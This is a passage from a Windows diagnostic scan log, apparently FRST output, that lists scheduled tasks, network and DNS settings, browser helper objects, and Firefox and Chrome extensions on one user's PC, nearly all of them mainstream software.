Task: {C5AF84F7-6442-4247-B119-92B2CF9F629C} - System32\Tasks\NvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1133368 2019-10-24] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {C698DA37-0D26-45AF-BEE8-54520F88F402} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [14680792 2019-02-12] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {C6F06415-FE51-4BE6-B0E4-643CBB27A75E} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [3301928 2019-10-25] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {CF8F2AC0-58C5-4051-9621-E5F0A57EEF86} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [913720 2019-10-24] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {D5900FBC-8DB1-44BD-BF7E-F0F70A5324D1} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1240656 2019-09-10] (Adobe Inc. -> Adobe Systems)
Task: {D7C263F5-F7E7-477F-BE56-5C459EA95F05} - System32\Tasks\BraveSoftwareUpdateTaskMachineCore => C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe [159368 2019-05-17] (Brave Software, Inc. -> BraveSoftware Inc.)
Task: {DDAF3136-E733-4ED8-B103-CE9DF84F732C} - System32\Tasks\Bitdefender AgentTask_AD394AE64E874073B10A89FEEC305A3C => C:\Program Files\Bitdefender\Bitdefender Security\bdagent.exe [525120 2019-12-18] (Bitdefender SRL -> Bitdefender)
Task: {E1630F06-70ED-4A8F-83F6-849B4C726819} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [619416 2019-02-12] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {E4D58664-06FC-442A-86BA-25A820A71F42} - System32\Tasks\NvBatteryBoostCheckOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [858480 2019-09-27] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {E612EA7D-83E9-4FCB-A5F7-B560AE9926E4} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156968 2019-02-27] (Google Inc -> Google Inc.)
Task: {E8BE3597-4CCF-42DF-84E8-A7B48E62040F} - System32\Tasks\Bitdefender Agent WatchDog_65D6944A0EF74FDAB96E31112AD39864 => C:\Program Files\Bitdefender Agent\WatchDog.exe [488760 2019-07-15] (Bitdefender SRL -> Bitdefender)
Task: {E91AAA2E-253F-49E5-82FE-6308F5EBE8EB} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1911.3-0\MpCmdRun.exe [469648 2019-12-07] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {FC10929C-B757-4C0F-A4FE-4443A9CE04E6} - System32\Tasks\update-sys => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe [414872 2017-04-12] (OOO Lightshot -> TODO: <Company name>)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\EPSON L1300 Series Invitation {3D13519D-D41E-4944-8882-7E5AAA0FE0EF}.job => C:\Windows\system32\spool\DRIVERS\x64\3\E_YTSLVE.EXE
Task: C:\WINDOWS\Tasks\EPSON L1300 Series Update {3D13519D-D41E-4944-8882-7E5AAA0FE0EF}.job => C:\Windows\system32\spool\DRIVERS\x64\3\E_YTSLVE.EXE:/EXE:{3D13519D-D41E-4944-8882-7E5AAA0FE0EF} /F:UpdateWORKGROUP\DESKTOP-1DF3CRC$ĊSearches for EPSON software updates, and notifies you when updates are available.If this task is disabled or stopped, your EPSON software will not be automatically kept up to date.Thi
Task: C:\WINDOWS\Tasks\Intel PTT EK Recertification.job => C:\Program Files\Intel\Intel(R) Management Engine Components\iCLS\IntelPTTEKRecertification.exe
Task: C:\WINDOWS\Tasks\update-S-1-5-21-3305917012-4270169547-4029195171-1001.job => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe
Task: C:\WINDOWS\Tasks\update-sys.job => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.254
Tcpip\..\Interfaces\{2eeec63d-7fe8-4fbd-a8e2-26851ad9ee3f}: [DhcpNameServer] 172.20.10.1
Tcpip\..\Interfaces\{95841bb6-8105-4d2e-9641-4d0df17b253f}: [NameServer] 1.1.1.1,8.8.8.8
Tcpip\..\Interfaces\{95841bb6-8105-4d2e-9641-4d0df17b253f}: [DhcpNameServer] 192.168.1.254
Tcpip\..\Interfaces\{baefaf9a-b4f0-4337-a344-32635598252e}: [NameServer] 1.1.1.1,8.8.8.8
Tcpip\..\Interfaces\{baefaf9a-b4f0-4337-a344-32635598252e}: [DhcpNameServer] 10.10.8.1

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = 
SearchScopes: HKU\S-1-5-21-3305917012-4270169547-4029195171-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IESR02&pc=UE00
SearchScopes: HKU\S-1-5-21-3305917012-4270169547-4029195171-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IESR02&pc=UE00
SearchScopes: HKU\S-1-5-21-3305917012-4270169547-4029195171-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-12242019165851383 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IESR02&pc=UE00
SearchScopes: HKU\S-1-5-21-3305917012-4270169547-4029195171-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-12242019165851383 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IESR02&pc=UE00
BHO: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC64.dll [2018-11-21] (Tonec Inc. -> Internet Download Manager, Tonec Inc.)
BHO: Bitdefender Trackers Blocking -> {159ff5d5-55f1-4d2f-b706-767a55f77abb} -> C:\Program Files\Bitdefender\Bitdefender Security\bdtbie.dll [2019-12-18] (Bitdefender SRL -> Bitdefender)
BHO: Bitdefender Wallet  -> {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} -> C:\Program Files\Bitdefender\Bitdefender Security\pmbxie.dll [2019-12-18] (Bitdefender SRL -> Bitdefender)
BHO: Adobe Acrobat Create PDF Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\DC\x64\AcroIEFavStub.dll [2019-03-25] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
BHO: Adobe Acrobat Create PDF from Selection -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\DC\x64\AcroIEFavStub.dll [2019-03-25] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
BHO-x32: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC.dll [2018-11-21] (Tonec Inc. -> Internet Download Manager, Tonec Inc.)
BHO-x32: Bitdefender Trackers Blocking -> {159ff5d5-55f1-4d2f-b706-767a55f77abb} -> C:\Program Files\Bitdefender\Bitdefender Security\antispam32\bdtbie.dll [2019-12-18] (Bitdefender SRL -> Bitdefender)
BHO-x32: Bitdefender Wallet -> {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} -> C:\Program Files\Bitdefender\Bitdefender Security\Antispam32\pmbxie.dll [2019-12-18] (Bitdefender SRL -> Bitdefender)
BHO-x32: E-Web Print -> {201CF130-E29C-4E5C-A73F-CD197DEFA6AE} -> C:\Program Files (x86)\Epson Software\E-Web Print\ewps_tb.dll [2014-11-27] (SEIKO EPSON CORPORATION -> SEIKO EPSON CORPORATION)
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\OCHelper.dll [2019-12-05] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_221\bin\ssv.dll [2019-08-02] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: Adobe Acrobat Create PDF Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\DC\AcroIEFavStub.dll [2019-03-25] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_221\bin\jp2ssv.dll [2019-08-02] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: Adobe Acrobat Create PDF from Selection -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\DC\AcroIEFavStub.dll [2019-03-25] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
Toolbar: HKLM - Bitdefender Wallet  - {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} - C:\Program Files\Bitdefender\Bitdefender Security\pmbxie.dll [2019-12-18] (Bitdefender SRL -> Bitdefender)
Toolbar: HKLM - Adobe Acrobat Create PDF Toolbar - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\DC\x64\AcroIEFavStub.dll [2019-03-25] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
Toolbar: HKLM-x32 - Bitdefender Wallet - {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} - C:\Program Files\Bitdefender\Bitdefender Security\Antispam32\pmbxie.dll [2019-12-18] (Bitdefender SRL -> Bitdefender)
Toolbar: HKLM-x32 - Adobe Acrobat Create PDF Toolbar - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\DC\AcroIEFavStub.dll [2019-03-25] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
Toolbar: HKLM-x32 - E-Web Print - {201CF130-E29C-4E5C-A73F-CD197DEFA6AE} - C:\Program Files (x86)\Epson Software\E-Web Print\ewps_tb.dll [2014-11-27] (SEIKO EPSON CORPORATION -> SEIKO EPSON CORPORATION)
Handler: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2019-12-05] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2019-12-05] (Microsoft Corporation -> Microsoft Corporation)
Handler: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2019-12-05] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2019-12-05] (Microsoft Corporation -> Microsoft Corporation)
Handler: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2019-12-05] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2019-12-05] (Microsoft Corporation -> Microsoft Corporation)
Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2019-12-05] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2019-12-05] (Microsoft Corporation -> Microsoft Corporation)

FireFox:
========
FF DefaultProfile: mpcqwsrh.default
FF ProfilePath: C:\Users\saenz\AppData\Roaming\Mozilla\Firefox\Profiles\mpcqwsrh.default [2019-12-24]
FF ProfilePath: C:\Users\saenz\AppData\Roaming\Mozilla\Firefox\Profiles\8hm09q7q.default-release-1575143500190 [2019-12-24]
FF HKLM\...\Firefox\Extensions: [[email protected]] - C:\Program Files\Bitdefender\Bitdefender Security\bdwteff.xpi
FF Extension: (Bitdefender Wallet) - C:\Program Files\Bitdefender\Bitdefender Security\bdwteff.xpi [2019-12-18]
FF HKLM\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Browser\WCFirefoxExtn\WebExtn\signed_extn\adobe_acrobat-1.0-windows.xpi
FF Extension: (Adobe Acrobat) - C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Browser\WCFirefoxExtn\WebExtn\signed_extn\adobe_acrobat-1.0-windows.xpi [2019-05-02]
FF HKLM\...\Firefox\Extensions: [[email protected]] - C:\Program Files\Bitdefender\Bitdefender Security\bdtbef.xpi
FF Extension: (Bitdefender Anti-tracker) - C:\Program Files\Bitdefender\Bitdefender Security\bdtbef.xpi [2019-11-18]
FF HKLM\...\Thunderbird\Extensions: [[email protected]] - C:\Program Files\Bitdefender\Bitdefender Security\bdtbext
FF Extension: (Bitdefender Antispam Toolbar) - C:\Program Files\Bitdefender\Bitdefender Security\bdtbext [2019-02-15] [Legacy] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [[email protected]] - C:\Program Files\Bitdefender\Bitdefender Security\bdwteff.xpi
FF HKLM-x32\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Browser\WCFirefoxExtn\WebExtn\signed_extn\adobe_acrobat-1.0-windows.xpi
FF HKLM-x32\...\Firefox\Extensions: [[email protected]] - C:\Program Files\Bitdefender\Bitdefender Security\bdtbef.xpi
FF HKLM-x32\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\Epson Software\E-Web Print\Firefox Add-on
FF Extension: (E-Web Print) - C:\Program Files (x86)\Epson Software\E-Web Print\Firefox Add-on [2019-07-15] [Legacy] [not signed]
FF HKLM-x32\...\Thunderbird\Extensions: [[email protected]] - C:\Program Files\Bitdefender\Bitdefender Security\bdtbext
FF HKU\S-1-5-21-3305917012-4270169547-4029195171-1001\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\Internet Download Manager\idmmzcc3.xpi
FF Extension: (IDM Integration Module) - C:\Program Files (x86)\Internet Download Manager\idmmzcc3.xpi [2018-10-18] [UpdateUrl:hxxps://data.internetdownloadmanager.com/idmmzcc3/update.json]
FF HKU\S-1-5-21-3305917012-4270169547-4029195171-1001\...\SeaMonkey\Extensions: [[email protected]] - C:\Users\saenz\AppData\Roaming\IDM\idmmzcc5
FF Extension: (IDM CC) - C:\Users\saenz\AppData\Roaming\IDM\idmmzcc5 [2019-04-19] [Legacy] [not signed]
FF HKU\S-1-5-21-3305917012-4270169547-4029195171-1001\...\SeaMonkey\Extensions: [[email protected]] - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi
FF Extension: (IDM integration) - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi [2017-12-20] [Legacy]
FF HKU\S-1-5-21-3305917012-4270169547-4029195171-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-12242019165851383\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\Internet Download Manager\idmmzcc3.xpi
FF HKU\S-1-5-21-3305917012-4270169547-4029195171-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-12242019165851383\...\SeaMonkey\Extensions: [[email protected]] - C:\Users\saenz\AppData\Roaming\IDM\idmmzcc5
FF HKU\S-1-5-21-3305917012-4270169547-4029195171-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-12242019165851383\...\SeaMonkey\Extensions: [[email protected]] - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\Office16\NPSPWRAP.DLL [2019-12-05] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2019-07-05] (Adobe Inc. -> Adobe Systems)
FF Plugin-x32: @java.com/DTPlugin,version=11.221.2 -> C:\Program Files (x86)\Java\jre1.8.0_221\bin\dtplugin\npDeployJava1.dll [2019-08-02] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.221.2 -> C:\Program Files (x86)\Java\jre1.8.0_221\bin\plugin2\npjp2.dll [2019-08-02] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\NPSPWRAP.DLL [2019-12-05] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @perfectworld.com/npArcPlayNowPlugin -> C:\Program Files (x86)\Arc\Plugins\npArcPluginFF.dll [No File]
FF Plugin-x32: @tools.brave.com/BraveSoftware Update;version=3 -> C:\Program Files (x86)\BraveSoftware\Update\1.3.99.0\npBraveUpdate3.dll [2019-05-17] (Brave Software, Inc. -> BraveSoftware Inc.)
FF Plugin-x32: @tools.brave.com/BraveSoftware Update;version=9 -> C:\Program Files (x86)\BraveSoftware\Update\1.3.99.0\npBraveUpdate3.dll [2019-05-17] (Brave Software, Inc. -> BraveSoftware Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.35.422\npGoogleUpdate3.dll [2019-12-13] (Google LLC -> Google LLC)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.35.422\npGoogleUpdate3.dll [2019-12-13] (Google LLC -> Google LLC)
FF Plugin-x32: @videolan.org/vlc,version=3.0.6 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.7.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.8 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: Adobe Acrobat -> C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Air\nppdf32.dll [2019-12-02] (Adobe Inc. -> Adobe Systems Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2019-07-05] (Adobe Inc. -> Adobe Systems)
FF ExtraCheck: C:\Program Files\mozilla firefox\defaults\pref\bd_js_config.js [2019-11-30] <==== ATTENTION (Points to *.cfg file)
FF ExtraCheck: C:\Program Files\mozilla firefox\bd_config.cfg [2019-11-30] <==== ATTENTION

Chrome: 
=======
CHR DefaultProfile: Profile 1
CHR DefaultSearchKeyword: Profile 1 -> lp
CHR Profile: C:\Users\saenz\AppData\Local\Google\Chrome\User Data\Default [2019-12-24]
CHR Extension: (Presentaciones) - C:\Users\saenz\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2019-02-27]
CHR Extension: (Documentos) - C:\Users\saenz\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2019-02-27]
CHR Extension: (Google Drive) - C:\Users\saenz\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2019-02-27]
CHR Extension: (Autenticador) - C:\Users\saenz\AppData\Local\Google\Chrome\User Data\Default\Extensions\bhghoamapcdpbohphigoooaddinpkbai [2019-07-10]
CHR Extension: (Pop up blocker for Chrome™ - Poper Blocker) - C:\Users\saenz\AppData\Local\Google\Chrome\User Data\Default\Extensions\bkkbcggnhapdmkeljlodobbkopceiche [2019-05-31]
CHR Extension: (YouTube) - C:\Users\saenz\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2019-02-27]
CHR Extension: (Adobe Acrobat) - C:\Users\saenz\AppData\Local\Google\Chrome\User Data\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2019-08-20]
CHR Extension: (Hojas de cálculo) - C:\Users\saenz\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2019-02-27]
CHR Extension: (Authy) - C:\Users\saenz\AppData\Local\Google\Chrome\User Data\Default\Extensions\gaedmjdfmmahhbjefcbgaolhhanlaolb [2019-02-27]
CHR Extension: (Bitdefender Wallet) - C:\Users\saenz\AppData\Local\Google\Chrome\User Data\Default\Extensions\gannpgaobkkhmpomoijebaigcapoeebl [2019-07-16]
CHR Extension: (Escritorio Remoto de Chrome) - C:\Users\saenz\AppData\Local\Google\Chrome\User Data\Default\Extensions\gbchcmhmhahfdphkhkmpfmihenigjmpp [2019-07-17]
CHR Extension: (Documentos de Google sin conexión) - C:\Users\saenz\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2019-02-27]
CHR Extension: (AdBlock: el mejor bloqueador de anuncios) - C:\Users\saenz\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2019-12-18]
CHR Extension: (LastPass: Free Password Manager) - C:\Users\saenz\AppData\Local\Google\Chrome\User Data\Default\Extensions\hdokiejnpimakedhajhdlcegeplioahd [2019-12-18]
CHR Extension: (Arcane Legends) - C:\Users\saenz\AppData\Local\Google\Chrome\User Data\Default\Extensions\ibmlkgieigeddcedpbijnpojheoddido [2019-02-27]
CHR Extension: (Voice Recognition) - C:\Users\saenz\AppData\Local\Google\Chrome\User Data\Default\Extensions\ikjmfindklfaonkodbnidahohdfbdhkn [2019-02-27]
CHR Extension: (Chrome Remote Desktop) - C:\Users\saenz\AppData\Local\Google\Chrome\User Data\Default\Extensions\inomeogfingihgjfjlpeplalcfajhgai [2019-06-19]
CHR Extension: (Unseen for Facebook) - C:\Users\saenz\AppData\Local\Google\Chrome\User Data\Default\Extensions\jiomcgpfgkeefipihnplhadgdoollmap [2019-09-24]
CHR Extension: (DS Amazon Quick View) - C:\Users\saenz\AppData\Local\Google\Chrome\User Data\Default\Extensions\jkompbllimaoekaogchhkmkdogpkhojg [2019-12-05]
CHR Extension: (Bitdefender Anti-tracker) - C:\Users\saenz\AppData\Local\Google\Chrome\User Data\Default\Extensions\khndhdhbebhaddchcgnalcjlaekbbeof [2019-12-05]
CHR Extension: (Webcam Toy) - C:\Users\saenz\AppData\Local\Google\Chrome\User Data\Default\Extensions\lfbgimoladefibpklnfmkpknadbklade [2019-02-27]
CHR Extension: (Application Launcher for Drive (by Google)) - C:\Users\saenz\AppData\Local\Google\Chrome\User Data\Default\Extensions\lmjegmlicamnimmfhcmpkclmigmmcbeh [2019-07-24]
CHR Extension: (LightShot (la herramienta de captura de pantalla)) - C:\Users\saenz\AppData\Local\Google\Chrome\User Data\Default\Extensions\mbniclmhobmnbdlbpiphghaielnnpgdp [2019-07-29]
CHR Extension: (deviantART muro) - C:\Users\saenz\AppData\Local\Google\Chrome\User Data\Default\Extensions\namljbfbglehfnlonjmebceimaalofei [2019-02-27]
CHR Extension: (Sistema de pagos de Chrome Web Store) - C:\Users\saenz\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-12-05]
CHR Extension: (Gmail) - C:\Users\saenz\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-04-29]
CHR Extension: (Chrome Media Router) - C:\Users\saenz\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-12-18]
CHR Profile: C:\Users\saenz\AppData\Local\Google\Chrome\User Data\Profile 1 [2019-12-24]
CHR Extension: (Presentaciones) - C:\Users\saenz\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2019-05-23]
CHR Extension: (Documentos) - C:\Users\saenz\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aohghmighlieiainnegkcijnfilokake [2019-05-23]
CHR Extension: (Google Drive) - C:\Users\saenz\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\apdfllckaahabafndbhieahigkjlhalf [2019-05-23]
CHR Extension: (YouTube) - C:\Users\saenz\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2019-05-23]
CHR Extension: (Hojas de cálculo) - C:\Users\saenz\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2019-05-23]
CHR Extension: (Documentos de Google sin conexión) - C:\Users\saenz\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2019-05-23]
CHR Extension: (AdBlock: el mejor bloqueador de anuncios) - C:\Users\saenz\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2019-12-18]
CHR Extension: (LastPass: Free Password Manager) - C:\Users\saenz\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\hdokiejnpimakedhajhdlcegeplioahd [2019-12-21]
CHR Extension: (Chrome Remote Desktop) - C:\Users\saenz\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\inomeogfingihgjfjlpeplalcfajhgai [2019-08-26]
CHR Extension: (Bitdefender Anti-tracker) - C:\Users\saenz\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\khndhdhbebhaddchcgnalcjlaekbbeof [2019-11-23]
CHR Extension: (Application Launcher for Drive (by Google)) - C:\Users\saenz\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\lmjegmlicamnimmfhcmpkclmigmmcbeh [2019-07-24]
CHR Extension: (Sistema de pagos de Chrome Web Store) - C:\Users\saenz\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-10-14]
CHR Extension: (Gmail) - C:\Users\saenz\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-05-23]
CHR Extension: (Chrome Media Router) - C:\Users\saenz\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-12-21]
CHR Profile: C:\Users\saenz\AppData\Local\Google\Chrome\User Data\System Profile [2019-05-23]
CHR HKLM\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2019-04-19]
CHR HKU\S-1-5-21-3305917012-4270169547-4029195171-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [lmjegmlicamnimmfhcmpkclmigmmcbeh]
CHR HKU\S-1-5-21-3305917012-4270169547-4029195171-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-12242019165851383\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [lmjegmlicamnimmfhcmpkclmigmmcbeh]
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj]
CHR HKLM-x32\...\Chrome\Extension: [gannpgaobkkhmpomoijebaigcapoeebl]
CHR HKLM-x32\...\Chrome\Extension: [khndhdhbebhaddchcgnalcjlaekbbeof]
